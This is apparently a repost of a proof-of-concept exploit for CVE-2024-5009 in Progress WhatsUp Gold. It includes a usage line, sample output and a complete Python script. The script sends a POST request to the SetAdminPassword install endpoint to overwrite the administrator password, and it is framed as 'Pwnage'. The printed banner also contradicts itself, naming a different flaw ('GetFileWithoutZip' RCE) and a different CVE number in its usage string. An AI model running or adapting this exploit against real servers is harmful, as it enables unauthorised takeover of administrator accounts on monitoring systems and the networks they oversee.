Local Privilege Escalation, WhatsUp Gold, CVE-2024-5009

[blackhunt]

CVE-2024-5009 PoC for Progress WhatsUp Gold SetAdminPassword Privilege Escalation (CVE-2024-5009)​

Analysis vulnerability: https://summoning.team/blog/progress-whatsup-gold-privesc-setadminpassword-cve-2024-5009/

Usage :

python3 CVE-2024-5009.py --target https://192.168.0.231/

 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |

        (*) Progress WhatsUp Gold GetFileWithoutZip Unauthenticated Remote Code Execution (CVE-2024-5009)

        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)

        (*) Technical details: https://summoning.team/blog/progress-whatsup-gold-privesc-setadminpassword-cve-2024-5009/



(^_^) Prepare for the Pwnage (^_^)

(*) Generated random password is: e9513bc41e2a9acf
(*) Escalating...
(+) Escalation done, new admin password is: e9513bc41e2a9acf

Exploit Code :

"""
Progress WhatsUp Gold SetAdminPassword Privilege Escalation (CVE-2024-5009)
Exploit By: Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
Technical details: https://summoning.team/blog/progress-whatsup-gold-privesc-setadminpassword-cve-2024-5009/
"""
banner = r"""
 _______ _     _ _______ _______  _____  __   _ _____ __   _  ______   _______ _______ _______ _______
 |______ |     | |  |  | |  |  | |     | | \  |   |   | \  | |  ____      |    |______ |_____| |  |  |
 ______| |_____| |  |  | |  |  | |_____| |  \_| __|__ |  \_| |_____| .    |    |______ |     | |  |  |
                                                                                   
        (*) Progress WhatsUp Gold SetAdminPassword Privilege Escalation (CVE-2024-5009)
       
        (*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)
       
        (*) Technical details: https://summoning.team/blog/progress-whatsup-gold-privesc-setadminpassword-cve-2024-5009/
       
        """

""""""

import warnings
warnings.filterwarnings("ignore", category=DeprecationWarning)
import requests
requests.packages.urllib3.disable_warnings()
import argparse
import os


print(banner)
parser = argparse.ArgumentParser(usage="python CVE-2024-4885.py --target https://192.168.0.231")
parser.add_argument('--target', '-t', dest='target_url', help='Target URL (e.g: http://192.168.0.231:9642)', required=True)
parser.add_argument('--new-password', '-p', dest='new_password', help='new password for the administrator user', required=False)
args = parser.parse_args()
if(args.new_password):
    new_password = args.new_password
else:
    new_password = os.urandom(8).hex()

print("\n(^_^) Prepare for the Pwnage (^_^)\n")
print("(*) Generated random password is: " + new_password)

args.target_url = args.target_url.rstrip("/")

def exploit():
    print("(*) Escalating...")
    r = requests.post(args.target_url + "/NmConsole/Wug/Install/SetAdminPassword", data={"Password": new_password, "ConfirmPassword":new_password}, verify=False, allow_redirects=False)

    if(r.status_code == 302):
        print("(+) Escalation done, new admin password is: " + new_password)
    else:
        print("(-) Failed to change the password")
        print("(-) Response: " + r.text)

try:
    exploit()
except Exception as e:
    print("(-) An error occurred: " + str(e))
    exit(1)

Source GitHub : https://github.com/sinsinology/CVE-2024-5009